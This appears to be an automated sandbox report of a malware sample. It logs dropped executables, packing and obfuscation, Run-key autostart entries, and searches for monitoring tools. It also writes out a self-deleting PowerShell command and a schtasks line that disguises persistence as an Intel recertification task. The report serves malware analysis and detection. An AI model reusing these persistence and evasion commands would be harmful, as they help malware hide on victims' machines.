Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: file.exe Static file information: File size 3196416 > 1048576
Source: file.exe Static PE information: Raw size of ybwlghty is bigger than: 0x100000 < 0x2a0a00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.a80000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 1.2.skotes.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 2.2.skotes.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.2e0000.0.unpack :EW;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;ybwlghty:EW;bbydquix:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Unpacked PE file: 36.2.847ee125a0.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Unpacked PE file: 37.2.6bf436adc7.exe.9b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jmepqeib:EW;vxwpxfml:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Unpacked PE file: 39.2.847ee125a0.exe.630000.0.unpack :EW;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;beewzkou:EW;avotpigk:EW;.taggant:EW;
Suspicious powershell command line found
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_00402665 LoadLibraryA,GetProcAddress,GetNativeSystemInfo, 7_2_00402665
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: 7z.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: random[1].exe.6.dr Static PE information: real checksum: 0x1d3039 should be: 0x1d353a
Source: 847ee125a0.exe.6.dr Static PE information: real checksum: 0x1d3039 should be: 0x1d353a
Source: 7z.dll.7.dr Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: random[1].exe2.6.dr Static PE information: real checksum: 0x2bd131 should be: 0x2c2ea9
Source: Intel_PTT_EK_Recertification.exe.21.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: in.exe.19.dr Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: file.exe Static PE information: real checksum: 0x3197ca should be: 0x3145fe
Source: skotes.exe.0.dr Static PE information: real checksum: 0x3197ca should be: 0x3145fe
Source: 06c8dc661c.exe.6.dr Static PE information: real checksum: 0x2bd131 should be: 0x2c2ea9
Source: random[1].exe0.6.dr Static PE information: real checksum: 0x1c096b should be: 0x1c4f60
Source: 6bf436adc7.exe.6.dr Static PE information: real checksum: 0x1c096b should be: 0x1c4f60
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name: ybwlghty
Source: file.exe Static PE information: section name: bbydquix
Source: file.exe Static PE information: section name: .taggant
Source: skotes.exe.0.dr Static PE information: section name:
Source: skotes.exe.0.dr Static PE information: section name: .idata
Source: skotes.exe.0.dr Static PE information: section name: ybwlghty
Source: skotes.exe.0.dr Static PE information: section name: bbydquix
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: .idata
Source: random[1].exe.6.dr Static PE information: section name:
Source: random[1].exe.6.dr Static PE information: section name: beewzkou
Source: random[1].exe.6.dr Static PE information: section name: avotpigk
Source: random[1].exe.6.dr Static PE information: section name: .taggant
Source: 847ee125a0.exe.6.dr Static PE information: section name:
Source: 847ee125a0.exe.6.dr Static PE information: section name: .idata
Source: 847ee125a0.exe.6.dr Static PE information: section name:
Source: 847ee125a0.exe.6.dr Static PE information: section name: beewzkou
Source: 847ee125a0.exe.6.dr Static PE information: section name: avotpigk
Source: 847ee125a0.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: jmepqeib
Source: random[1].exe0.6.dr Static PE information: section name: vxwpxfml
Source: random[1].exe0.6.dr Static PE information: section name: .taggant
Source: 6bf436adc7.exe.6.dr Static PE information: section name:
Source: 6bf436adc7.exe.6.dr Static PE information: section name: .idata
Source: 6bf436adc7.exe.6.dr Static PE information: section name:
Source: 6bf436adc7.exe.6.dr Static PE information: section name: jmepqeib
Source: 6bf436adc7.exe.6.dr Static PE information: section name: vxwpxfml
Source: 6bf436adc7.exe.6.dr Static PE information: section name: .taggant
Source: random[1].exe2.6.dr Static PE information: section name:
Source: random[1].exe2.6.dr Static PE information: section name: .idata
Source: random[1].exe2.6.dr Static PE information: section name: smeyiuht
Source: random[1].exe2.6.dr Static PE information: section name: kkcdotxm
Source: random[1].exe2.6.dr Static PE information: section name: .taggant
Source: 06c8dc661c.exe.6.dr Static PE information: section name:
Source: 06c8dc661c.exe.6.dr Static PE information: section name: .idata
Source: 06c8dc661c.exe.6.dr Static PE information: section name: smeyiuht
Source: 06c8dc661c.exe.6.dr Static PE information: section name: kkcdotxm
Source: 06c8dc661c.exe.6.dr Static PE information: section name: .taggant
Source: in.exe.19.dr Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.21.dr Static PE information: section name: UPX2
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A9D91C push ecx; ret 0_2_00A9D92F
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B98101 push 79450764h; mov dword ptr [esp], edi 0_2_00B9815D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B98101 push ebp; mov dword ptr [esp], edx 0_2_00B98175
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B98101 push 342366EEh; mov dword ptr [esp], esi 0_2_00B9817D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B98101 push 671F8ABEh; mov dword ptr [esp], ebx 0_2_00B98185
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00B98101 push esi; mov dword ptr [esp], eax 0_2_00B981DA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00A91359 push es; ret 0_2_00A9135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 1_2_002FD91C push ecx; ret 1_2_002FD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 2_2_002FD91C push ecx; ret 2_2_002FD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002FD91C push ecx; ret 6_2_002FD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0031DEDB push ss; iretd 6_2_0031DEDC
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_002FDFC6 push ecx; ret 6_2_002FDFD9
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Code function: 7_2_004192C0 push eax; ret 7_2_004192EE
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe Code function: 12_2_0061676A push rcx; ret 12_2_0061676B
Source: file.exe Static PE information: section name: entropy: 7.162224148383568
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.162224148383568
Source: random[1].exe.6.dr Static PE information: section name: entropy: 7.978482515372212
Source: random[1].exe.6.dr Static PE information: section name: beewzkou entropy: 7.9535775684603935
Source: 847ee125a0.exe.6.dr Static PE information: section name: entropy: 7.978482515372212
Source: 847ee125a0.exe.6.dr Static PE information: section name: beewzkou entropy: 7.9535775684603935
Source: random[1].exe0.6.dr Static PE information: section name: jmepqeib entropy: 7.953655595962165
Source: 6bf436adc7.exe.6.dr Static PE information: section name: jmepqeib entropy: 7.953655595962165
Source: random[1].exe2.6.dr Static PE information: section name: entropy: 7.822621783253833
Source: 06c8dc661c.exe.6.dr Static PE information: section name: entropy: 7.822621783253833
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1
Source: initial sample Static PE information: section name: UPX0
Source: initial sample Static PE information: section name: UPX1

Persistence and Installation Behavior
barindex
Uses cmd line tools excessively to alter registry or file data
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe Process created: attrib.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: attrib.exe Jump to behavior
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\main\in.exe File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013565001\06c8dc661c.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013564001\da3bdc2ac0.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe File created: C:\Users\user\AppData\Local\Temp\main\7z.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\C1J7SVw[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 06c8dc661c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da3bdc2ac0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 847ee125a0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6bf436adc7.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013563001\6bf436adc7.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013562001\847ee125a0.exe Window searched: window name: PROCMON_WINDOW_CLASS
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\AppData\Local\Temp\main\in.exe Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 847ee125a0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 847ee125a0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6bf436adc7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6bf436adc7.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da3bdc2ac0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run da3bdc2ac0.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 06c8dc661c.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 06c8dc661c.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
